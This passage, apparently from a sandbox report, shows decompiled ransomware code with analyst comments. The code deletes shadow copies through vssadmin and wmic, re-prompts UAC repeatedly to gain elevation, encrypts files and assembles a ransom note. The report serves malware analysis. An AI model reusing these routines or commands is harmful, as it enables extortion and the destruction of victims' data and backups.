                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				char _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				char _v120;
                                        				short _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				intOrPtr _v140;
                                        				intOrPtr _v144;
                                        				intOrPtr _v148;
                                        				char _v152;
                                        				short _v156;
                                        				intOrPtr _v160;
                                        				intOrPtr _v164;
                                        				intOrPtr _v168;
                                        				char _v172;
                                        				short* _v176;
                                        				short* _t51;
                                        				WCHAR* _t59;
                                        				void* _t62;
                                        				signed int _t66;
                                        				void* _t69;
                                        
                                         				if(E0FC63B20(_t62) == 0) {
                                         					// E0FC63B20 is the OS version check built on VerSetConditionMask /
                                         					// VerifyVersionInfoW (see APIs below). When it returns zero the command
                                         					// line is assembled as stacked UTF-16 words, two characters per dword with
                                         					// the low word first: _v172.._v156 spell L"\cmd.exe" and _v84.._v8 spell
                                         					// L"/c vssadmin delete shadows /all /quiet".
                                         					_v172 = 0x63005c;
                                         					_v168 = 0x64006d;
                                         					_v8 = 0;
                                         					_t59 =  &_v172;
                                         					_v164 = 0x65002e;
                                         					_t51 =  &_v84;
                                         					_v160 = 0x650078;
                                         					_v156 = 0;
                                         					_v84 = 0x63002f;
                                         					_v80 = 0x760020;
                                         					_v76 = 0x730073;
                                         					_v72 = 0x640061;
                                         					_v68 = 0x69006d;
                                         					_v64 = 0x20006e;
                                         					_v60 = 0x650064;
                                         					_v56 = 0x65006c;
                                         					_v52 = 0x650074;
                                         					_v48 = 0x730020;
                                         					_v44 = 0x610068;
                                         					_v40 = 0x6f0064;
                                         					_v36 = 0x730077;
                                         					_v32 = 0x2f0020;
                                         					_v28 = 0x6c0061;
                                         					_v24 = 0x20006c;
                                         					_v20 = 0x71002f;
                                         					_v16 = 0x690075;
                                         					_v12 = 0x740065;
                                         				} else {
                                         					// Other path: _v152.._v124 spell L"\wbem\wmic.exe" and _v120.._v88 spell
                                         					// L"shadowcopy delete". Both branches remove Volume Shadow Copies so the
                                         					// victim cannot restore encrypted files from snapshots.
                                         					_v152 = 0x77005c;
                                         					_v148 = 0x650062;
                                         					_t59 =  &_v152;
                                         					_v144 = 0x5c006d;
                                         					_t51 =  &_v120;
                                         					_v140 = 0x6d0077;
                                         					_v136 = 0x630069;
                                         					_v132 = 0x65002e;
                                         					_v128 = 0x650078;
                                         					_v124 = 0;
                                         					_v120 = 0x680073;
                                         					_v116 = 0x640061;
                                         					_v112 = 0x77006f;
                                         					_v108 = 0x6f0063;
                                         					_v104 = 0x790070;
                                         					_v100 = 0x640020;
                                         					_v96 = 0x6c0065;
                                         					_v92 = 0x740065;
                                         					_v88 = 0x65;
                                         				}
                                         				_v176 = _t51;
                                         				// 1 KiB buffer (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) for the
                                         				// system directory followed by the relative executable path chosen above.
                                         				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                         				if(_t69 != 0) {
                                         					GetSystemDirectoryW(_t69, 0x100);
                                         					lstrcatW(_t69, _t59);
                                         					// Verb "open", no parent window; _v176 carries the deletion arguments.
                                         					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                         					// Decompiler rendering of the cmp/sbb/not idiom: the return value is
                                         					// nonzero only when ShellExecuteW reported success (result above 32).
                                         					asm("sbb edi, edi");
                                         					_t66 =  ~0x20;
                                         				} else {
                                         					_t66 = 0;
                                         				}
                                         				VirtualFree(_t69, 0, 0x8000);
                                         				return _t66;
                                         			}
                                        			}

                                         Instruction addresses covered by the listing above: 0x0fc643f6 to 0x0fc645f5 (62 entries).

                                        APIs
                                          • Part of subcall function 0FC63B20: _memset.LIBCMT ref: 0FC63B72
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
                                          • Part of subcall function 0FC63B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FC6459F
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FC645B5
                                        • lstrcatW.KERNEL32(00000000,0063005C), ref: 0FC645BD
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FC645D3
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC645E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                         • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                        • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                        • API String ID: 2684037697-4098772853
                                        • Opcode ID: 94b56a929a5545d71e9539122508f07f0f773bc118ec9585620891417e1607bc
                                        • Instruction ID: 3d152a0044f27fe1d5ccffc92d0aa60d963f0e15426760aeab04ddacc322f590
                                        • Opcode Fuzzy Hash: 94b56a929a5545d71e9539122508f07f0f773bc118ec9585620891417e1607bc
                                        • Instruction Fuzzy Hash: C841F6B054C380DEE3208F119849B5BBFE6BB85B59F10491CE6985A291C7F6854CCFA7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0FC63BE0(void* __ecx, void* __edx, void* __eflags) {
                                        				char _v1020;
                                        				short _v1028;
                                        				char _v1532;
                                        				short _v1540;
                                        				intOrPtr _v1548;
                                        				intOrPtr _v1552;
                                        				intOrPtr _v1556;
                                        				intOrPtr _v1560;
                                        				intOrPtr _v1564;
                                        				intOrPtr _v1568;
                                        				intOrPtr _v1572;
                                        				intOrPtr _v1576;
                                        				intOrPtr _v1580;
                                        				intOrPtr _v1584;
                                        				intOrPtr _v1588;
                                        				intOrPtr _v1592;
                                        				intOrPtr _v1596;
                                        				intOrPtr _v1600;
                                        				intOrPtr _v1604;
                                        				intOrPtr _v1608;
                                        				intOrPtr _v1612;
                                        				intOrPtr _v1616;
                                        				short _v1620;
                                        				intOrPtr _v1624;
                                        				intOrPtr _v1628;
                                        				intOrPtr _v1632;
                                        				intOrPtr _v1636;
                                        				intOrPtr _v1640;
                                        				intOrPtr _v1644;
                                        				intOrPtr _v1648;
                                        				intOrPtr _v1652;
                                        				intOrPtr _v1656;
                                        				intOrPtr _v1660;
                                        				intOrPtr _v1664;
                                        				intOrPtr _v1668;
                                        				intOrPtr _v1672;
                                        				short _v1676;
                                        				char _v1680;
                                        				int _t54;
                                        				struct HWND__* _t62;
                                        				long _t66;
                                        				void* _t76;
                                        				void* _t78;
                                        				void* _t80;
                                        
                                         				_t78 = __ecx;
                                         				// Same VerifyVersionInfoW-based check as in E0FC643E0; the elevation
                                         				// attempt below runs only when it succeeds and E0FC63AA0 (not shown in
                                         				// this listing) returns zero.
                                         				_t54 = E0FC63B20(__edx);
                                         				if(_t54 != 0) {
                                         					_t54 = E0FC63AA0();
                                         					if(_t54 == 0) {
                                         						// _v1676.._v1624 spell L"%windir%\system32\wbem\wmic" as stacked
                                         						// UTF-16 words (two characters per dword, low word first).
                                         						_v1676 = 0x770025;
                                         						_v1672 = 0x6e0069;
                                         						_v1668 = 0x690064;
                                         						_v1664 = 0x250072;
                                         						_v1660 = 0x73005c;
                                         						_v1656 = 0x730079;
                                         						_v1652 = 0x650074;
                                         						_v1648 = 0x33006d;
                                         						_v1644 = 0x5c0032;
                                         						_v1640 = 0x620077;
                                         						_v1636 = 0x6d0065;
                                         						_v1632 = 0x77005c;
                                         						_v1628 = 0x69006d;
                                         						_v1624 = 0x63;
                                         						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                         						// _v1620.._v1548 spell L"process call create \"cmd /c start %s\"".
                                         						_v1620 = 0x720070;
                                         						_v1616 = 0x63006f;
                                         						_v1612 = 0x730065;
                                         						_v1608 = 0x200073;
                                         						_v1604 = 0x610063;
                                         						_v1600 = 0x6c006c;
                                         						_v1596 = 0x630020;
                                         						_v1592 = 0x650072;
                                         						_v1588 = 0x740061;
                                         						_v1584 = 0x200065;
                                         						_v1580 = 0x630022;
                                         						_v1576 = 0x64006d;
                                         						_v1572 = 0x2f0020;
                                         						_v1568 = 0x200063;
                                         						_v1564 = 0x740073;
                                         						_v1560 = 0x720061;
                                         						_v1556 = 0x200074;
                                         						_v1552 = 0x730025;
                                         						_v1548 = 0x22;
                                         						// %s is the caller-supplied string passed in ecx (_t78); the elevated
                                         						// wmic instance re-launches it through cmd.exe.
                                         						wsprintfW( &_v1028,  &_v1620, _t78);
                                         						// The allocation is a SHELLEXECUTEINFOW (0x3c bytes on 32-bit Windows).
                                         						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                         						 *_t76 = 0x3c;                              // cbSize
                                         						 *(_t76 + 4) = 0x40;                        // fMask = SEE_MASK_NOCLOSEPROCESS
                                         						_t62 = GetForegroundWindow();
                                         						_t80 = 0;
                                         						 *(_t76 + 8) = _t62;                        // hwnd
                                         						// _v1680.._v1672 are reused for L"runas", the verb that raises the UAC
                                         						// consent prompt.
                                         						_v1680 = 0x750072;
                                         						_v1676 = 0x61006e;
                                         						_v1672 = 0x73;
                                         						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;     // lpVerb = L"runas"
                                         						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;    // lpFile = expanded wmic path
                                         						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;    // lpParameters = formatted command line
                                         						 *(_t76 + 0x18) = 0;                        // lpDirectory
                                         						 *(_t76 + 0x1c) = 0;                        // nShow = SW_HIDE
                                         						 *(_t76 + 0x20) = 0;                        // hInstApp
                                         						// Re-issue the elevation request until it succeeds, at most 0x64 (100)
                                         						// times; the UAC prompt reappears each time the user declines it.
                                         						while(1) {
                                         							_t66 = ShellExecuteExW(_t76);
                                         							if(_t66 != 0) {
                                         								break;
                                         							}
                                         							_t80 = _t80 + 1;
                                         							if(_t80 < 0x64) {
                                         								continue;
                                         							}
                                         							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                         							goto L6;
                                         						}
                                         						// +0x38 is hProcess (returned because of SEE_MASK_NOCLOSEPROCESS): wait
                                         						// for the elevated launch, then terminate this unelevated instance.
                                         						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                         						CloseHandle( *(_t76 + 0x38));
                                         						ExitProcess(0);
                                         					}
                                         				}
                                         				L6:
                                         				return _t54;
                                         			}

                                        APIs
                                          • Part of subcall function 0FC63B20: _memset.LIBCMT ref: 0FC63B72
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
                                          • Part of subcall function 0FC63B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FC63BC5
                                          • Part of subcall function 0FC63AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FC63AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FC63C8D
                                        • wsprintfW.USER32 ref: 0FC63D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FC63D6B
                                        • GetForegroundWindow.USER32 ref: 0FC63D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0FC63DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC63DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FC63E06
                                        • CloseHandle.KERNEL32(?), ref: 0FC63E0F
                                        • ExitProcess.KERNEL32 ref: 0FC63E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: 1b99fd7762a415691f724eecdb82b82eadafca8b419e0b064390ee4e3f55aabb
                                        • Instruction ID: b63a145f73e98297533a881924306f181388fe58a6dafc960b341500e92d9079
                                        • Opcode Fuzzy Hash: 1b99fd7762a415691f724eecdb82b82eadafca8b419e0b064390ee4e3f55aabb
                                        • Instruction Fuzzy Hash: 09515AB0008341DFE3208F51D489B9ABFF9FF84759F004A1DE6989A251D7FA9158CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E0FC635E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                        				long _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				long _v32;
                                        				long _v36;
                                        				void _v40;
                                        				void _v44;
                                        				signed int _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				void* _v60;
                                        				void* _v64;
                                        				void* _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				short _v80;
                                        				int _v84;
                                        				char _v88;
                                        				char _v104;
                                        				char _v108;
                                        				char _v140;
                                        				char _v388;
                                        				void* _t96;
                                        				void* _t97;
                                        				struct HWND__* _t99;
                                        				void* _t101;
                                        				void* _t107;
                                        				long _t124;
                                        				long _t125;
                                        				long _t128;
                                        				WCHAR* _t145;
                                        				void* _t147;
                                        				void* _t149;
                                        				void* _t151;
                                        				WCHAR* _t162;
                                        				void* _t163;
                                        				void* _t164;
                                        				void _t165;
                                        				void* _t166;
                                        				long _t168;
                                        				void* _t173;
                                        				void* _t175;
                                        				void* _t176;
                                        				void* _t177;
                                        
                                        				_t145 = __ecx;
                                        				_t166 = __edx;
                                        				_v52 = __ecx;
                                        				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
                                        				_v20 = 0;
                                        				_v32 = 0;
                                        				_t151 = _t166;
                                        				E0FC663D0(_t151, 0, 0,  &_v20,  &_v32);
                                        				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_v80 = 0x47002e;
                                        				_v56 = _t162;
                                        				_v76 = 0x430044;
                                        				_v72 = 0x42;
                                        				lstrcpyW(_t162, _t145);
                                        				lstrcatW(_t162,  &_v80);
                                        				asm("movdqa xmm0, [0xfc704b0]");
                                        				asm("movdqu [ebp-0x88], xmm0");
                                        				_push(_t151);
                                        				asm("movdqa xmm0, [0xfc704b0]");
                                        				asm("movdqu [ebp-0x78], xmm0");
                                        				_v108 = 0;
                                        				asm("movdqa xmm0, [0xfc704b0]");
                                        				asm("movdqu [ebp-0x64], xmm0");
                                        				E0FC682A0( &_v104, 0x10);
                                        				E0FC682A0( &_v140, 0x20);
                                        				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x88]");
                                        				asm("movdqu [ebx], xmm0");
                                        				asm("movdqu xmm0, [ebp-0x78]");
                                        				_v24 = _t96;
                                        				asm("movdqu [ebx+0x10], xmm0");
                                        				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x64]");
                                        				_t163 = _t97;
                                        				_v60 = _t163;
                                        				asm("movdqu [edi], xmm0");
                                        				_v88 = 0x20;
                                        				_v84 = 0x10;
                                        				_t99 = E0FC66530(_v20, _v32, _t96,  &_v88, 0x800);
                                        				_t175 = _t173 + 0x18;
                                        				if(_t99 != 0) {
                                        					_t101 = E0FC66530(_v20, _v32, _t163,  &_v84, 0x800);
                                        					_t176 = _t175 + 0x14;
                                        					if(_t101 != 0) {
                                        						E0FC683C0( &_v140,  &_v388);
                                        						_t177 = _t176 + 8;
                                        						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                        						_v28 = _t147;
                                        						if(_t147 != 0xffffffff) {
                                        							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
                                        							 *_t164 = 0;
                                        							 *(_t164 + 4) = 0;
                                        							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                        							_t168 = 0;
                                        							_v12 = _t107;
                                        							_v36 = 0;
                                        							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
                                        								_t124 = _v8;
                                        								if(_t124 != 0) {
                                        									_t149 = 0;
                                        									_v64 = 0;
                                        									_t168 =  <  ? 1 : _t168;
                                        									 *_t164 =  *_t164 + _t124;
                                        									asm("adc [edi+0x4], ebx");
                                        									_t125 = _v8;
                                        									_v48 = _t125;
                                        									if((_t125 & 0x0000000f) != 0) {
                                        										do {
                                        											_t125 = _t125 + 1;
                                        										} while ((_t125 & 0x0000000f) != 0);
                                        										_v8 = _t125;
                                        									}
                                        									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
                                        									E0FC689C0(_t126, _v12, _v48);
                                        									_t128 = _v8;
                                        									_t177 = _t177 + 0xc;
                                        									_v40 = _t128;
                                        									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
                                        										E0FC63500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
                                        										_t149 = _v64;
                                        										_t177 = _t177 + 0x10;
                                        									}
                                        									VirtualFree(_v68, 0, 0x8000);
                                        									SetFilePointer(_v28,  ~_v48, 0, 1);
                                        									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
                                        										_t168 = 1;
                                        										_v36 = 1;
                                        									}
                                        									VirtualFree(_t149, 0, 0x8000);
                                        									_t147 = _v28;
                                        									if(_t168 == 0) {
                                        										_t107 = _v12;
                                        										continue;
                                        									}
                                        								}
                                        								break;
                                        							}
                                        							VirtualFree(_v12, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
                                        							}
                                        							CloseHandle(_t147);
                                        							_v40 =  *_t164;
                                        							VirtualFree(_t164, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							VirtualFree(_v60, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								MoveFileW(_v52, _v56);
                                        							}
                                        							_t165 = _v40;
                                        						} else {
                                        							VirtualFree(_t163, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							asm("xorps xmm0, xmm0");
                                        							asm("movlpd [ebp-0x28], xmm0");
                                        							_t165 = _v44;
                                        						}
                                        					} else {
                                        						GetLastError();
                                        						asm("xorps xmm0, xmm0");
                                        						asm("movlpd [ebp-0x28], xmm0");
                                        						_t165 = _v44;
                                        					}
                                        				} else {
                                        					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movlpd [ebp-0x28], xmm0");
                                        					_t165 = _v44;
                                        				}
                                        				VirtualFree(_v56, 0, 0x8000);
                                        				return _t165;
                                        			}

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FC635F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FC635FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FC6363A
                                        • lstrcpyW.KERNEL32 ref: 0FC63658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0FC63663
                                          • Part of subcall function 0FC682A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FC682C0
                                          • Part of subcall function 0FC682A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FC682E8
                                          • Part of subcall function 0FC682A0: GetModuleHandleA.KERNEL32(?), ref: 0FC6833D
                                          • Part of subcall function 0FC682A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FC6834B
                                          • Part of subcall function 0FC682A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FC6835A
                                          • Part of subcall function 0FC682A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FC6837E
                                          • Part of subcall function 0FC682A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6838C
                                          • Part of subcall function 0FC682A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683A0
                                          • Part of subcall function 0FC682A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FC6292B), ref: 0FC683AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FC636C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FC636F1
                                          • Part of subcall function 0FC66530: EnterCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000,00000000,?,00000800), ref: 0FC6653B
                                          • Part of subcall function 0FC66530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FC63724,00000000,00000000,00000000), ref: 0FC6655E
                                          • Part of subcall function 0FC66530: GetLastError.KERNEL32(?,0FC63724,00000000,00000000,00000000), ref: 0FC66568
                                          • Part of subcall function 0FC66530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC63724,00000000,00000000,00000000), ref: 0FC66584
                                        • MessageBoxA.USER32 ref: 0FC63738
                                        • GetLastError.KERNEL32 ref: 0FC63773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC639E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 980d3ef730e57dc6bb77747edc4dd74ac432392c15eddadb000befb01ac1830c
                                        • Instruction ID: 39da0a4045df564fab5e35b9e4cd8005da54d269e9fa0f3257394fe19d1a3159
                                        • Opcode Fuzzy Hash: 980d3ef730e57dc6bb77747edc4dd74ac432392c15eddadb000befb01ac1830c
                                        • Instruction Fuzzy Hash: 43C16071E44309ABEB118B95DC86FEEBBB8FF08711F204115F741BA2C1DBB86A548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 49%
                                        			E0FC640E0(void* __ecx, void* __edx) {
                                        				char _v148;
                                        				char _v152;
                                        				WCHAR* _v156;
                                        				void* _v160;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				intOrPtr _v224;
                                        				intOrPtr _v228;
                                        				intOrPtr _v232;
                                        				char _v236;
                                        				intOrPtr _v240;
                                        				void* _v244;
                                        				intOrPtr _v248;
                                        				intOrPtr _v252;
                                        				intOrPtr _v256;
                                        				intOrPtr _v260;
                                        				intOrPtr _v264;
                                        				intOrPtr _v268;
                                        				intOrPtr _v272;
                                        				intOrPtr _v276;
                                        				char _v280;
                                        				void* _t54;
                                        				void* _t58;
                                        				void* _t60;
                                        				signed int _t61;
                                        				void* _t62;
                                        				WCHAR* _t65;
                                        				signed short _t69;
                                        				signed short* _t70;
                                        				WCHAR* _t77;
                                        				signed int _t82;
                                        				signed int _t83;
                                        				void* _t87;
                                        				void* _t90;
                                        				long _t93;
                                        				WCHAR* _t94;
                                        				signed int _t97;
                                        				void* _t98;
                                        				WCHAR* _t100;
                                        				void* _t102;
                                        
                                        				if( *0xfc72a64 != 0) {
                                        					L24:
                                        					return _t54;
                                        				}
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				E0FC639F0( &_v148);
                                        				E0FC67330( &_v236, __edx);
                                        				_t97 = E0FC67140( &_v236);
                                        				_t93 = 0x42 + _t97 * 2;
                                        				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
                                        				_v244 = _t58;
                                        				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                        					_t98 = 0;
                                        				} else {
                                        					_t98 = _t58;
                                        				}
                                        				E0FC66F40( &_v152, _t98);
                                        				_t60 = E0FC68090(_t98, L"ransom_id=");
                                        				_t61 = lstrlenW(L"ransom_id=");
                                        				asm("movdqa xmm1, [0xfc704a0]");
                                        				_t77 = 0xfc72000;
                                        				_t87 = 0xa3;
                                        				_t100 = _t60 + _t61 * 2;
                                        				_t62 = 0xa30;
                                        				_v160 = _t100;
                                        				do {
                                        					_t13 =  &(_t77[8]); // 0x44004e
                                        					_t77 = _t13;
                                        					asm("movdqu xmm0, [ecx-0x10]");
                                        					asm("pxor xmm0, xmm1");
                                        					asm("movdqu [ecx-0x10], xmm0");
                                        					_t87 = _t87 - 1;
                                        				} while (_t87 != 0);
                                        				do {
                                        					 *(_t62 + 0xfc72000) =  *(_t62 + 0xfc72000) ^ 0x00000005;
                                        					_t62 = _t62 + 1;
                                        				} while (_t62 < 0xa38);
                                        				 *0xfc72a64 = 0xfc72000;
                                        				_t94 = E0FC68090(0xfc72000, L"{USERID}");
                                        				if(_t94 == 0) {
                                        					L20:
                                        					_v280 = 0x740068;
                                        					_v276 = 0x700074;
                                        					_v272 = 0x3a0073;
                                        					_v268 = 0x2f002f;
                                        					_v264 = 0x770077;
                                        					_v260 = 0x2e0077;
                                        					_v256 = 0x6f0074;
                                        					_v252 = 0x700072;
                                        					_v248 = 0x6f0072;
                                        					_v244 = 0x65006a;
                                        					_v240 = 0x740063;
                                        					_v236 = 0x6f002e;
                                        					_v232 = 0x670072;
                                        					_v228 = 0x64002f;
                                        					_v224 = 0x77006f;
                                        					_v220 = 0x6c006e;
                                        					_v216 = 0x61006f;
                                        					_v212 = 0x2f0064;
                                        					_v208 = 0x6f0064;
                                        					_v204 = 0x6e0077;
                                        					_v200 = 0x6f006c;
                                        					_v196 = 0x640061;
